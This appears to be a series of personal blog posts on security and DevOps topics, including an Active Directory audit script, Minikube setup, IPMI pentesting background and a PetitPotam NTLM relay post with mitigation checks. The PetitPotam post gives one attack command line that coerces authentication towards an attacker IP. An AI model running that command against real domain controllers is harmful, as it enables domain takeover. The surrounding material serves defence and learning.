Jul 31, 2021

Trimarc Security Assessment: Securing Active Directory


This is a great presentation that talks about:

  • Active Directory security assessment
    • Identifying AD Security Issues: 8:44 
    • AD Duplicate SPNs: 17:54 
    • AD Admin Account Checks: 20:26 
    • Protected Users: 22:48 
    • Kerberos Delegation Recommendations: 38:00 
    • Tools for Reviewing AD: 50:35 
    • Invoke-TrimarcADChecks: 51:18 
    • Q&A: 53:25

AD security reviews:

  • User account issues
  • Domain Password policy
  • Tombstone Lifetime & Backups
  • Trusts
  • Duplicate SPNs
  • Group Policy Preference Passwords
  • AD Administration & Privileged Accounts
  • KRBTGT
  • Kerberos Delegation
  • Domain & GPO Permissions
  • Domain Controller Security
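Several items in the review list above can be checked with read-only AD PowerShell queries. The script below is an added example, not material from the Trimarc talk or from Invoke-TrimarcADChecks; the 180-day KRBTGT threshold and the comparison of Domain Admins against Protected Users are choices made here, not the presentation's.

```powershell
# Added example (not from the Trimarc talk or Invoke-TrimarcADChecks).
# Read-only checks for five items from the review list. Needs the RSAT
# ActiveDirectory module and an account that can read the directory.
Import-Module ActiveDirectory
$root     = Get-ADRootDSE
$findings = @()

# 1. KRBTGT: forged tickets stay valid as long as the current (or previous)
#    KRBTGT key does. 180 days is the rotation threshold chosen here.
$krbtgt = Get-ADUser krbtgt -Properties PasswordLastSet
if ($krbtgt.PasswordLastSet -lt (Get-Date).AddDays(-180)) {
    $findings += "KRBTGT password last set $($krbtgt.PasswordLastSet)"
}

# 2. Tombstone lifetime: backups older than this cannot be restored safely.
#    A missing attribute means the legacy default of 60 days.
$dsDn = "CN=Directory Service,CN=Windows NT,CN=Services,$($root.configurationNamingContext)"
$tsl  = (Get-ADObject $dsDn -Properties tombstoneLifetime).tombstoneLifetime
if (-not $tsl) { $tsl = 60 }
if ($tsl -lt 180) { $findings += "Tombstone lifetime is $tsl days (180 recommended)" }

# 3. Duplicate SPNs: two accounts claiming one SPN break Kerberos for that
#    service, and clients silently fall back to NTLM.
$spnOwners = @{}
Get-ADObject -LDAPFilter '(servicePrincipalName=*)' -Properties servicePrincipalName |
    ForEach-Object {
        foreach ($spn in $_.servicePrincipalName) {
            if (-not $spnOwners.ContainsKey($spn)) { $spnOwners[$spn] = @() }
            $spnOwners[$spn] += $_.DistinguishedName
        }
    }
foreach ($e in $spnOwners.GetEnumerator()) {
    if ($e.Value.Count -gt 1) { $findings += "Duplicate SPN $($e.Key): $($e.Value -join '; ')" }
}

# 4. Unconstrained delegation (TRUSTED_FOR_DELEGATION, 0x80000) on anything
#    other than a domain controller (primaryGroupID 516, RODC 521).
$uac = 'userAccountControl:1.2.840.113556.1.4.803:=524288'
Get-ADComputer -LDAPFilter "(&($uac)(!(primaryGroupID=516))(!(primaryGroupID=521)))" |
    ForEach-Object { $findings += "Unconstrained delegation: $($_.DNSHostName)" }
Get-ADUser -LDAPFilter "($uac)" |
    ForEach-Object { $findings += "Unconstrained delegation (user): $($_.SamAccountName)" }

# 5. Protected Users: privileged accounts outside the group can still
#    authenticate with NTLM and RC4 and can still be delegated.
$protected = Get-ADGroupMember 'Protected Users' -Recursive | Select-Object -ExpandProperty DistinguishedName
Get-ADGroupMember 'Domain Admins' -Recursive |
    Where-Object { $protected -notcontains $_.DistinguishedName } |
    ForEach-Object { $findings += "Domain Admin not in Protected Users: $($_.SamAccountName)" }

if ($findings) { $findings } else { 'No findings' }
```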

Links:

Jul 30, 2021

Learn K8s with Minikube

Here are the steps I follow to set up Minikube on Ubuntu.


$ sudo apt update && sudo apt upgrade -y

$ sudo apt install virtualbox virtualbox-ext-pack

$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
$ chmod +x ./kubectl
$ sudo mv ./kubectl /usr/local/bin/kubectl

$ kubectl version --output=yaml

$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 && chmod +x minikube && sudo mv minikube /usr/local/bin/

$ minikube version -o json 

$ minikube start --vm-driver=docker

$ kubectl get pods

$ kubectl get nodes

$ kubectl config view

$ kubectl cluster-info

$ minikube ssh 

$ minikube status

$ minikube dashboard

$ minikube dashboard --url

 

Links:

  • https://phoenixnap.com/kb/install-minikube-on-ubuntu

Jul 29, 2021

Docker Learning Guides

Here are a few links for beginners learning about Docker and Kubernetes: Docker, containers, Kubernetes, images, registries, pods, replica sets, services, deployments, and microservices.

 

Links:

  • https://dev.to/educative/absolute-beginner-s-guide-to-docker-what-is-a-container-lck
  • https://www.educative.io/blog/docker-kubernetes-beginners-guide
  • https://www.educative.io/blog/kubernetes-deployments-pods-services
  • https://www.educative.io/blog/microservices-architecture-tutorial-all-you-need-to-get-started

Jul 28, 2021

Pentesting IPMI and BMC

Recently I learned a few things about BMCs and the IPMI protocol.

Baseboard Management Controllers (BMCs) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI. 

BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system's motherboard. Network access is obtained either via 'sideband' access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards.

The Intelligent Platform Management Interface (IPMI) is a collection of specifications that define communication protocols for talking both across a local bus and over the network. The specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0.

Dan Farmer has published research on the security of the IPMI network protocol, which uses UDP port 623.

Links:

Jul 27, 2021

Start Your Own Pentest on Cloud and Container with Atomic Red Team

Atomic Red Team is a collection of small, highly portable detection tests mapped to MITRE ATT&CK®. This gives defenders a highly actionable way to immediately start testing their defenses against a broad spectrum of attacks.

MITRE ATT&CK™ offers the security community a common language to communicate about adversary tactics, techniques, and behaviors. In the articles and resources below, we offer guidance on how security teams can use the framework to expand detection coverage and increase visibility.

Links:

  • https://redcanary.com/blog/art-cloud-containers/
  • https://redcanary.com/atomic-red-team/ 
  • https://redcanary.com/mitre-attack/
  • https://github.com/redcanaryco/atomic-red-team/
  • https://attack.mitre.org/resources/updates/


Jul 26, 2021

Byobu

After GNU screen and tmux, I'm learning how to use Byobu, a terminal multiplexer that is easy to use. Byobu gives you multiple windows, consoles and split panes within those windows, and it also shows status badges and notifications in the terminal.

Unfortunately, it doesn't work well with PuTTY. Some shortcuts are not working even with some tweaking.

Links:

  • https://www.byobu.org/home
  • https://www.digitalocean.com/community/tutorials/how-to-install-and-use-byobu-for-terminal-management-on-ubuntu-16-04
  • https://www.tutorialspoint.com/how-to-enable-or-install-byobu-for-terminal-management-on-ubuntu-16-04
  • https://codeyarns.com/tech/2013-01-21-byobu-function-keys-do-not-work-in-putty.html
  • https://www.naturalborncoder.com/linux/2014/10/28/getting-started-with-byobu/ 
  • https://superuser.com/questions/651427/function-key-shortcuts-in-putty-mintty-and-tmux-byobu

 

Jul 25, 2021

PetitPotam Attack

Within a month of PrintNightmare and HiveNightmare, here comes PetitPotam for Windows administrators.

This new exploit, derived from PrintNightmare, takes advantage of NTLM relay to abuse a function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC API) over the network.

The MS-EFSRPC API is enabled by default on all Windows machines, and disabling the MS-EFS service will not prevent this attack from being successful.

A malicious actor could exploit this feature to gain full control of a Microsoft Windows Domain Controller and the entire Windows Domain.

Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
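Since disabling EFS does not help, the defence is to make the relay target reject relayed NTLM. The script below is an added example, not from the PetitPotam repository or the linked articles: it audits the AD CS settings that the Microsoft mitigations in ADV210003 rely on (Extended Protection for Authentication, required SSL, incoming NTLM denied on the CA host). It assumes the default "CertSrv" application under "Default Web Site"; add the CES/CEP application names to $apps if they are installed.

```powershell
# Added example (not from the PetitPotam repo or the linked advisories): audit
# the AD CS settings that Microsoft's relay mitigations (ADV210003) rely on.
# Run on the CA / web enrollment host. Assumes the default "CertSrv" app under
# "Default Web Site"; add the CES/CEP application names to $apps if present.
Import-Module WebAdministration

$site   = 'Default Web Site'
$apps   = @('CertSrv')
$issues = @()

foreach ($app in $apps) {
    $path = "IIS:\Sites\$site\$app"
    if (-not (Test-Path $path)) { $issues += "$app not found under '$site'"; continue }

    # EPA binds the NTLM handshake to the TLS channel, so a handshake relayed
    # from another connection is rejected. Guidance is tokenChecking = Require.
    $epa = Get-WebConfiguration -PSPath $path `
        -Filter 'system.webServer/security/authentication/windowsAuthentication/extendedProtection'
    if ($epa.tokenChecking -ne 'Require') {
        $issues += "$app EPA tokenChecking is '$($epa.tokenChecking)', expected 'Require'"
    }

    # EPA only protects connections that are actually TLS: SSL must be required.
    $access = Get-WebConfiguration -PSPath $path -Filter 'system.webServer/security/access'
    if (("$($access.sslFlags)" -split ',\s*') -notcontains 'Ssl') {
        $issues += "$app does not require SSL (sslFlags='$($access.sslFlags)')"
    }
}

# Host level: "Network security: Restrict NTLM: Incoming NTLM traffic"
# (RestrictReceivingNTLMTraffic, 2 = Deny all accounts) blocks relayed NTLM
# at the CA even if an application is misconfigured.
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue
if ($lsa.RestrictReceivingNTLMTraffic -ne 2) {
    $issues += "Incoming NTLM not denied on this host (RestrictReceivingNTLMTraffic=$($lsa.RestrictReceivingNTLMTraffic))"
}

if ($issues) { $issues } else { 'AD CS relay mitigations are in place' }
```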

Links:

  • https://github.com/topotam/PetitPotam
  • https://therecord.media/new-petitpotam-attack-forces-windows-hosts-to-share-their-password-hashes/ 
  • https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 
  • https://video.twimg.com/tweet_video/E7AW7-aXEAEmy2X.mp4
  • https://www.bleepingcomputer.com/news/microsoft/new-petitpotam-attack-allows-take-over-of-windows-domains/
  • https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-new-petitpotam-ntlm-relay-attack/
  • https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-efsr
  • https://www.dataprise.com/resources/blog/windows-server-petitpotam-defense-digest
  • https://securityaffairs.co/wordpress/120489/hacking/windows-petitpotam-attack.html